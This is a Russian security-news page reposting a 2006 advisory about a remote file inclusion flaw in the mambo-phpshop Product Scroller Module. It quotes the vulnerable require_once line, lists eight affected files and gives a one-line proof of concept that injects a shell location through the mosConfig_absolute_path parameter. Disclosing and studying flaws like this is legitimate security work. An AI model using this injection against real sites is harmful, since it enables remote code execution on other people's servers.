Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  [SA21543] mail f/w system Mail Header Injection Vulnerability

  [SA21604] Drupal E-commerce Module Script Insertion Vulnerabilities

  [SA21603] Drupal Easylinks Module Script Insertion and SQL Injection

  [SA21584] Empire CMS "check_path"
File Inclusion Vulnerability

From:outlaw_(at)_aria-security.net <outlaw_(at)_aria-security.net>
Date:21 августа 2006 г.
Subject:mambo-phphop Product Scroller Module R.F.I

       ##########################################################################
#################
       #            Aria-Security.net Advisory                                        #
       #            Discovered  by: O.U.T.L.A.W                                       #    

       #            < www.Aria-security.net >                                            #
       #        Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                            #
       #                                                                    #
       ##########################################################################
#################
#Software: mambo-phphop Product Scroller Module                                               
#Attack method: Remote File Inclusion

#Source:
  
/* Load the phpshop main parse code */
require_once( $mosConfig_absolute_path.'/components/com_phpshop/phpshop_parser.php' );


*********************************************************************************
***

#Vulnarable Files:
   mod_phpshop.php
   mod_phpshop_allinone.php
   mod_phpshop_cart.php
   mod_phpshop_featureprod.php
   mod_phpshop_latestprod.php
   mod_product_categories.php
   mod_productscroller.php
   mosproductsnap.php

                                              
#Proof of Concept:                                         
#one of the files above.php?mosConfig_absolute_path=SHELL
#                              
#----------------------------------------------------------                               
#                                                                 

                             
#                                                      
#Contact : [email protected]                                                       
                                                           

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород